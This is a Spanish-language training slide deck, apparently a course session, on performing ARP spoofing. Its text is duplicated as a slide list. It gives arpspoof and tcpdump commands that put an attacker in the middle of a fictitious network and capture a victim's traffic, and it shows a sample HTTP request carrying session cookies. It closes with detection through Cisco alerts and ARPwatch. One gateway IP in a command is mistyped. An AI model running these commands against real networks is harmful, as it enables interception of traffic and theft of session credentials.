Como hacer ARP Spoofing
Sesion 3
Como hacer ARP Spoofing
 Una de mejores formas de solucionar un problema, es saber cual es y creo que no
hay mejor forma de entenderlo que intentar hacerlo. Hoy vamos a ver como hacer
ARP Spoofing (también llamado ARP Poisoning)
Esquema inicial
Como hacer ARP Spoofing
 Vamos a suponer una red ficticia: 172.16.0.0/12, en la cual el gateway esta en la
172.16.0.1 y existen dos hosts: 172.16.0.2 (el usuario) y 172.16.0.3 (el atacante)
 Para simplificar, la MAC de los equipos corresponderá a el último byte de la IP. Por
ejemplo, si la IP es 172.16.0.1, asumiremos que si MAC es 00:00:00:00:00:01
Como hacer ARP Spoofing
 Mediante arpspoof podemos realizar el spoofing mediante los siguientes
parámetros:
 -i: interfaz en el que haremos el spoofing
 -t: El target a quien le vamos a decir nuestra MAC
 La IP del host que queremos suplantar
Como hacer ARP Spoofing
 Para evitar que se corte el trafico del usuario deberemos activar IP forwarding.
Simplemente deberemos hacer un echo al proc:
 echo 1 > /proc/sys/net/ipv4/ip_forward
Como hacer ARP Spoofing
 A continuación deberemos envenenar la tabla ARP de tanto el gateway como el
usuario para obtener hacer pasar el tráfico por el sistema del atacante en ambas
direcciones:
 arpspoof -i eth0 -t 172.16.0.2 172.16.0.1
Envenenando la tabla ARP del usuario
Como hacer ARP Spoofing
 A continuación hacemos lo mismo (en paralelo) con el gateway:
 arpspoof -i eth0 -t 172.10.0.1 172.16.0.2
Envenenando la tabla ARP del gateway
Como hacer ARP Spoofing
 Con esto ya podemos hacer un tcpdump en el equipo atacante para capturar todo
el tráfico del usuario:
tcpdump -nni eth0 'host 172.16.0.2' -s 0 -w /tmp/all.your.packet.are.belong.to.us
Equipo haciendo ARP Spoofing
Como hacer ARP Spoofing
 Un ejemplo de tráfico HTTP que podríamos ver sería:
 GET http://www.google.es/search?hl=es&source=hp&q=HOLA&btnG=Buscar+con+Google&meta=&aq=f&oq= HTTP/1.1
 Host: www.google.com
 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.6; Google-TR-5.9.911.3589-es) Gecko/20091201
Firefox/3.5.6
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip,deflate
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
 Keep-Alive: 300
 Proxy-Connection: keep-alive
 Referer: http://www.google.com/
 Cookie: SS=Q0=bWFuIG5j;
PREF=ID=0d7e92f0a892dcdb:U=a0d7411c93a9da83:TM=1261735618:LM=1261735947:S=usa2aENTuGjs6433;
NID=30=E85Pp_GbpOrzO3dZsK8DqZiZ08XdR-C8BuJ3sEFDN5DHuw2TY8ew0a_QE_q8R6XNDEE439iNspdpZUOLexoMb
 jHOcepayTpXPMwsxFNgAK951t59ZSaXI0qNxq0xQ0wg; SID=DQAAAIUAAACDMrYRGnoD5BYlPIKfMF1oOgds-
T_bIw7Ynjy6wVbkOIDSglRTdglRiVY8VFb44ndsuboemg6oMecz-
a8y8bprLcUh0U0Kkij68JSc2aYCyldfKVIZyO518ywtcjTvozNh9v3Vrvf25OwTypC9F9h
 4oUWfQnHxY6AGpcPtecNo1f4QvHD3maLGRuh-uE89Ju8; HSID=AX3Vf3Lm0i2yz9st-
Como hacer ARP Spoofing
 En equipos CISCO en este tipo de ataques se generaría una
alerta similar a la siguiente:
 Dec 31 09:53:10 MET: %SW_MATM-4-MACFLAP_NOTIF: Host
000a.aaac.007f in vlan 10 is flapping between port Gi0/1 and
port Gi0/2
 Existen diferentes herramientas para detectar este tipo de
ataques, siendo el más conocido el ARPwatch.

Como hacer ARP Spoofing

  • 1.
    Como hacer ARPSpoofing Sesion 3
  • 2.
    Como hacer ARPSpoofing  Una de mejores formas de solucionar un problema, es saber cual es y creo que no hay mejor forma de entenderlo que intentar hacerlo. Hoy vamos a ver como hacer ARP Spoofing (también llamado ARP Poisoning)
  • 3.
  • 4.
    Como hacer ARPSpoofing  Vamos a suponer una red ficticia: 172.16.0.0/12, en la cual el gateway esta en la 172.16.0.1 y existen dos hosts: 172.16.0.2 (el usuario) y 172.16.0.3 (el atacante)  Para simplificar, la MAC de los equipos corresponderá a el último byte de la IP. Por ejemplo, si la IP es 172.16.0.1, asumiremos que si MAC es 00:00:00:00:00:01
  • 5.
    Como hacer ARPSpoofing  Mediante arpspoof podemos realizar el spoofing mediante los siguientes parámetros:  -i: interfaz en el que haremos el spoofing  -t: El target a quien le vamos a decir nuestra MAC  La IP del host que queremos suplantar
  • 6.
    Como hacer ARPSpoofing  Para evitar que se corte el trafico del usuario deberemos activar IP forwarding. Simplemente deberemos hacer un echo al proc:  echo 1 > /proc/sys/net/ipv4/ip_forward
  • 7.
    Como hacer ARPSpoofing  A continuación deberemos envenenar la tabla ARP de tanto el gateway como el usuario para obtener hacer pasar el tráfico por el sistema del atacante en ambas direcciones:  arpspoof -i eth0 -t 172.16.0.2 172.16.0.1
  • 8.
    Envenenando la tablaARP del usuario
  • 9.
    Como hacer ARPSpoofing  A continuación hacemos lo mismo (en paralelo) con el gateway:  arpspoof -i eth0 -t 172.10.0.1 172.16.0.2
  • 10.
    Envenenando la tablaARP del gateway
  • 11.
    Como hacer ARPSpoofing  Con esto ya podemos hacer un tcpdump en el equipo atacante para capturar todo el tráfico del usuario: tcpdump -nni eth0 'host 172.16.0.2' -s 0 -w /tmp/all.your.packet.are.belong.to.us
  • 12.
  • 13.
    Como hacer ARPSpoofing  Un ejemplo de tráfico HTTP que podríamos ver sería:  GET http://www.google.es/search?hl=es&source=hp&q=HOLA&btnG=Buscar+con+Google&meta=&aq=f&oq= HTTP/1.1  Host: www.google.com  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.6; Google-TR-5.9.911.3589-es) Gecko/20091201 Firefox/3.5.6  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3  Accept-Encoding: gzip,deflate  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  Keep-Alive: 300  Proxy-Connection: keep-alive  Referer: http://www.google.com/  Cookie: SS=Q0=bWFuIG5j; PREF=ID=0d7e92f0a892dcdb:U=a0d7411c93a9da83:TM=1261735618:LM=1261735947:S=usa2aENTuGjs6433; NID=30=E85Pp_GbpOrzO3dZsK8DqZiZ08XdR-C8BuJ3sEFDN5DHuw2TY8ew0a_QE_q8R6XNDEE439iNspdpZUOLexoMb  jHOcepayTpXPMwsxFNgAK951t59ZSaXI0qNxq0xQ0wg; SID=DQAAAIUAAACDMrYRGnoD5BYlPIKfMF1oOgds- T_bIw7Ynjy6wVbkOIDSglRTdglRiVY8VFb44ndsuboemg6oMecz- a8y8bprLcUh0U0Kkij68JSc2aYCyldfKVIZyO518ywtcjTvozNh9v3Vrvf25OwTypC9F9h  4oUWfQnHxY6AGpcPtecNo1f4QvHD3maLGRuh-uE89Ju8; HSID=AX3Vf3Lm0i2yz9st-
  • 14.
    Como hacer ARPSpoofing  En equipos CISCO en este tipo de ataques se generaría una alerta similar a la siguiente:  Dec 31 09:53:10 MET: %SW_MATM-4-MACFLAP_NOTIF: Host 000a.aaac.007f in vlan 10 is flapping between port Gi0/1 and port Gi0/2  Existen diferentes herramientas para detectar este tipo de ataques, siendo el más conocido el ARPwatch.